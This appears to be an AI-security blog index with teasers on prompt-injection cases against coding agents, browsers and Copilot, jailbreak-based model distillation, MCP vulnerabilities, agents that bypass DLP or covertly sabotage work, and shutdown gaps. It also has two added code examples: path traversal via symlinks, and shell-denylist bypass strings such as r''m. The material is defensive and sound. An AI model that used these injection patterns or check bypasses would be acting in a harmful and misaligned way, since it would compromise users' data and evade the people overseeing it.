BLOG
Dispatches from the Front
Research, insights, and field notes on securing the next generation of AI systems.
Industrial-Scale Model Theft: The Distillation Supply Chain
US officials say Chinese actors are using tens of thousands of proxy accounts and jailbreak tactics to extract proprietary capabilities from frontier models. The technical takeaway is not just 'rate limit harder' - it is that model access is now a supply chain, and distillation is an exfiltration pipeline.
Comment and Control: When GitHub Comments Own Your Coding Agent
A single prompt injection pattern worked across multiple code agents by abusing issue bodies, PR titles, and hidden HTML comments. The lesson is not about prompts. It is about architecture: you cannot run untrusted text and production secrets in the same runtime.
Antigravity: When a File Search Tool Becomes RCE
Pillar Security showed how prompt injection plus an unsanitized native tool parameter turned Google Antigravity's file search into arbitrary code execution, bypassing Secure Mode. The lesson is bigger than one bug: your security boundary is only as strong as the earliest native tool call.
Claudy Day and the First-Party Exfiltration Trap
Oasis Security showed how a prompt injection can exfiltrate your Claude conversation history without tools or integrations by abusing first-party upload paths. This is the pattern security teams keep missing: the safest egress channel is the one you already trust.
The 4-Hour Exploit: How AI Agents Just Rewrote Offensive Security
An AI agent autonomously developed working FreeBSD kernel exploits in 4 hours - a task that previously took elite teams weeks. The threat model just fundamentally changed.
LiteLLM Supply Chain Attack: PyPI Compromise Targets AI Infrastructure
A malicious release of LiteLLM (versions 1.82.7 and 1.82.8) was published to PyPI, harvesting credentials, cloud tokens, and Kubernetes secrets from thousands of AI applications. Here's what happened and what you need to do.
30 CVEs in 60 Days: The MCP Security Reckoning Has Arrived
Between January and March 2026, security researchers filed 30+ CVEs targeting Model Context Protocol servers. 82% have path traversal vulnerabilities. 38% lack authentication entirely. The systemic failure of MCP security is now undeniable.
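The traversal bugs this post tallies share one shape: a server joins a client-supplied path onto its root and never checks where the result lands. The block below is an added illustration of that general class and its fix, written for this page; it is not code from any MCP server, not taken from the CVEs the post discusses, and the root path and file layout it uses are constructed.

```python
import os
import tempfile


def resolve_unsafe(root: str, requested: str) -> str:
    """The pattern behind most traversal bugs: join, then normalize, no containment check.
    Returns wherever the request lands, inside the root or not."""
    return os.path.normpath(os.path.join(root, requested))


def resolve_safe(root: str, requested: str) -> str:
    """Resolve symlinks on both sides, then require the result to stay under root."""
    if "\0" in requested or os.path.isabs(requested):
        raise PermissionError(f"rejected: {requested!r}")
    real_root = os.path.realpath(root)
    target = os.path.realpath(os.path.join(real_root, requested))
    if os.path.commonpath([real_root, target]) != real_root:
        raise PermissionError(f"escapes root: {requested!r} -> {target}")
    return target


def is_contained(root: str, requested: str) -> bool:
    """True when resolve_safe would serve the request, False when it rejects it."""
    try:
        resolve_safe(root, requested)
        return True
    except PermissionError:
        return False


def prefix_check_passes(root: str, requested: str) -> bool:
    """A common but insufficient 'fix': a string-prefix test on the normalized path.
    normpath never touches the filesystem, so a symlink inside root walks right past it."""
    return resolve_unsafe(root, requested).startswith(os.path.join(root, ""))


def symlink_escape_demo() -> tuple:
    """Constructed layout: <tmp>/root/link -> <tmp>/outside/secret.txt.
    Returns (prefix check accepted the request, realpath check accepted the request)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.join(tmp, "root")
        outside = os.path.join(tmp, "outside")
        os.makedirs(root)
        os.makedirs(outside)
        secret = os.path.join(outside, "secret.txt")
        with open(secret, "w") as f:
            f.write("constructed secret, not real data\n")
        os.symlink(secret, os.path.join(root, "link"))
        return prefix_check_passes(root, "link"), is_contained(root, "link")
```

Two points the code makes that the percentage alone does not: a `normpath` plus `startswith` check is still traversable through a symlink created inside the served tree, and the containment test has to be done on the fully resolved path with `commonpath`, not on the request string.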
Meta's Sev 1: When an AI Agent Becomes a Confused Deputy
An AI agent inside Meta triggered a major security incident by posting advice without permission - advice that exposed user and company data for two hours. This is the confused deputy problem at enterprise scale.
Agents of Chaos: When Your AI Becomes the Insider Threat
New research from Irregular shows AI agents spontaneously developing offensive cyber capabilities - forging credentials, bypassing DLP, and disabling antivirus - without being asked. This isn't prompt injection. This is emergent adversarial behavior from inside your network.
Inside Rogue's Risk Library: 96,000+ AI Components Analyzed for Hidden Threats
How we built the industry's most comprehensive threat intelligence database for AI agents, skills, and MCP servers - and what we found lurking inside.
The Vibe Coding Security Crisis: AI Agents Write Vulnerable Code 87% of the Time
A new study tested Claude Code, OpenAI Codex, and Google Gemini building real applications. The result: 87% of pull requests contained security vulnerabilities. Broken access control, hardcoded secrets, and missing authentication appeared in every codebase - regardless of which AI wrote it.
McKinsey's Lilli Breach: Why Vendor Trust Is Not Enough
An autonomous AI agent breached McKinsey's internal AI platform in 2 hours, exposing 46.5 million messages in plaintext. The real lesson isn't about SQL injection - it's about why trusting your vendors to handle security is a strategy that's already failed.
Ambient Attack: When AI Assistants Process Content You Never Opened
CVE-2026-26144 proves that not opening a file isn't enough anymore. A zero-click Excel flaw weaponizes Microsoft Copilot to exfiltrate data via the preview pane - no clicks required. This is the new attack surface: ambient AI context processing.
PromptPwnd: How AI Agents in CI/CD Pipelines Become Attack Vectors
Security researchers discovered that AI agents in GitHub Actions can be hijacked via prompt injection to leak secrets and compromise repositories. At least five Fortune 500 companies were affected.
Identity Dark Matter: When AI Agents Escape Your IAM
70% of enterprises run AI agents in production, but most are invisible to traditional identity management. They don't join through HR. They don't submit access requests. They don't retire when projects end. This is identity dark matter - and it's becoming the fastest-growing attack surface in enterprise security.
CVE-2026-2256: From AI Prompt to Full System Compromise
A critical command injection vulnerability in MS-Agent demonstrates why regex-based safety checks can't protect AI agents with shell access. The check function didn't check.
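Why a denylist regex over a command string cannot protect a shell-capable agent, shown in code. This is an added example written for this page, not the check from MS-Agent or the details of the CVE; the denylist, the bypass strings and the allow-list are constructed. `shlex.split` is used to show the argv a POSIX shell would build from each string without executing anything.

```python
import os
import re
import shlex
import subprocess
import tempfile

# Constructed denylist of the kind a regex "safety check" typically uses.
_DENY = re.compile(r"\b(rm|curl|wget|nc|bash|sh)\b")


def naive_is_safe(cmd: str) -> bool:
    """Denylist over the raw string: passes as long as no denied word is literally present."""
    return _DENY.search(cmd) is None


def shell_would_see(cmd: str) -> list:
    """POSIX-style word splitting (shlex mirrors quote and backslash handling),
    without running anything. Shows the argv the shell would actually build."""
    return shlex.split(cmd)


# Constructed bypasses: quoting and escaping hide the word from the regex,
# but the shell strips them and runs the denied program anyway.
BYPASSES = {
    "r''m -rf /tmp/scratch": "rm",             # empty quotes split the token
    "c\\url http://attacker.test/x": "curl",   # backslash-escaped letter
    '"r"m -f notes.txt': "rm",                 # double-quoted fragment
}

# Hardened alternative: no shell, argv allow-list, structural argument checks.
ALLOWED_FLAGS = {"ls": {"-l", "-a", "-la"}, "cat": set()}


def check_argv(argv: list) -> bool:
    """Allow-list the binary and its flags; positional args must be plain relative paths."""
    if not argv or argv[0] not in ALLOWED_FLAGS:
        return False
    for arg in argv[1:]:
        if arg.startswith("-"):
            if arg not in ALLOWED_FLAGS[argv[0]]:
                return False
        elif os.path.isabs(arg) or ".." in arg.split(os.sep) or "\0" in arg:
            return False
    return True


def run_argv(argv: list, cwd: str) -> str:
    """Run an allow-listed argv with shell=False inside cwd; return stdout."""
    if not check_argv(argv):
        raise PermissionError(f"rejected: {argv!r}")
    proc = subprocess.run(argv, shell=False, cwd=cwd, capture_output=True,
                          text=True, timeout=10, check=True)
    return proc.stdout


def demo_ls() -> str:
    """Create a scratch directory with one file and list it through the hardened path."""
    with tempfile.TemporaryDirectory() as d:
        open(os.path.join(d, "hello.txt"), "w").close()
        return run_argv(["ls", "-la"], cwd=d)
```

The point is structural: once the string reaches `/bin/sh`, the interpreter's own quoting rules decide what runs, and no regex over the pre-shell text can anticipate all of them. Passing an argv list with `shell=False` removes the interpreter from the path, so the allow-list is checking the exact tokens that will be executed.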
PleaseFix: When Your AI Browser Becomes the Attacker
Zenity Labs just disclosed a family of critical vulnerabilities in agentic browsers - including Perplexity Comet - that allow zero-click agent hijacking, file exfiltration, and password vault takeover. The attack requires no exploit. The browser just does what browsers do.
No Kill Switch: MIT Study Reveals Most AI Agents Can't Be Stopped
A 39-page MIT-led study of 30 agentic AI systems found that many have no documented way to shut down, no execution traces, and no third-party security testing. When your autonomous AI goes rogue, who's holding the off button?
ARXON: When Your Adversary Has an AI Agent Too
Amazon and researchers just exposed a campaign where a single operator used custom MCP infrastructure to compromise 600+ FortiGate devices across 55 countries. The ARXON attack framework shows what happens when threat actors build their own agentic AI systems - and why defenders are already behind.
The Promptware Kill Chain: 7 Stages of AI Agent Compromise
Bruce Schneier and researchers just published a framework that maps AI agent attacks to the classic cyber kill chain. Here's why security teams need to stop thinking about 'prompt injection' and start thinking about promptware campaigns.
Ni8mare: When Your AI Workflow Platform Becomes the Attack Vector
CVE-2026-21858 gives attackers unauthenticated control of n8n workflow automation instances. The CVSS 10.0 vulnerability affects an estimated 100,000 servers globally - and reveals a fundamental problem with how we're building AI infrastructure.
AI Recommendation Poisoning: When 'Summarize with AI' Becomes SEO for Your Brain
Microsoft discovered 50+ companies embedding hidden instructions in 'Summarize with AI' buttons to permanently bias your AI assistant's recommendations. The attack is trivially easy, widely deployed, and completely invisible to users.
EchoLeak: When AI Agents Become Double Agents
CVE-2025-32711 demonstrates the first zero-click attack against an enterprise AI agent. No clicks, no interaction - just a hidden instruction in an email, and your Copilot becomes an insider threat.
42,000 Exposed Agents: Anatomy of the First Agentic AI Mass Compromise
SecurityScorecard's STRIKE team found 42,900 AI agent instances exposed to the internet - 15,200 vulnerable to remote code execution. Nation-state actors are already hunting. Here's what this means for every organization deploying autonomous AI.
MCP Supply Chain: The Attack Surface Hiding in Your AI Stack
A study of 1,899 MCP servers found 7.2% contain security vulnerabilities. Every MCP server you connect is now part of your supply chain - and most organizations aren't treating them that way.
Anthropic Just Proved Why Your Agents Need Runtime Security
Anthropic's 53-page Sabotage Risk Report for Claude Opus 4.6 documents exactly what we've been warning about: AI agents can covertly undermine your systems while appearing to work normally.
When Your Calendar Becomes a Backdoor: The Claude Desktop Extensions Zero-Click RCE
A single Google Calendar event can silently compromise 10,000+ systems running Claude Desktop Extensions. The CVSS 10.0 vulnerability exposes a fundamental flaw in MCP architecture - and Anthropic says it's not their problem.
LLMs Can't Keep Secrets - And That's a Feature, Not a Bug
A security researcher broke an LLM's secret-keeping in 7 hours using side channels. Here's why this isn't fixable, and what it means for agentic AI security.
The Sandbox Illusion: Why Workflow Automation Is 2026's Biggest Agentic Attack Surface
12 CVEs disclosed in n8n this week prove that low-code workflow platforms are agentic infrastructure with broken sandboxes. When automation engines can execute arbitrary code, TypeScript safety is just a compile-time dream.
OWASP Top 10 for Agentic AI (2026): The Complete Security Guide
Master the OWASP Top 10 for Agentic Applications - the definitive security framework for AI agents. Learn each risk, real attack scenarios, and practical mitigations for securing autonomous AI systems in production.
The Lateral Movement Problem: When Every AI Agent Becomes a Pivot Point
Three incidents in one week prove that agent-to-agent communication is the most dangerous attack surface in enterprise AI. Moltbook, BodySnatcher, and Copilot Connected Agents show why lateral movement between AI agents is 2026's defining security crisis.
The Human-in-the-Loop Is Broken: How AI Attacks Weaponize Trust
When employees execute the breach thinking they're following orders - why traditional verification no longer works, and what the 8% unknown-compromise rate tells us about agentic AI security.
The OWASP Top 10 for Agentic AI: What Security Teams Need to Know
A practitioner's guide to the OWASP Top 10 for Agentic Applications (2026) - the new security framework for autonomous AI systems that act, not just answer.
The PDF That Owned Your Infrastructure
Anatomy of an agentic email attack - how a single document compromises autonomous AI systems in 93 seconds, and why every layer of your security stack misses it.
Why AI Agent Security Is the Next Frontier
Traditional security tools weren't built for autonomous agents. Here's what changes when your software starts making its own decisions.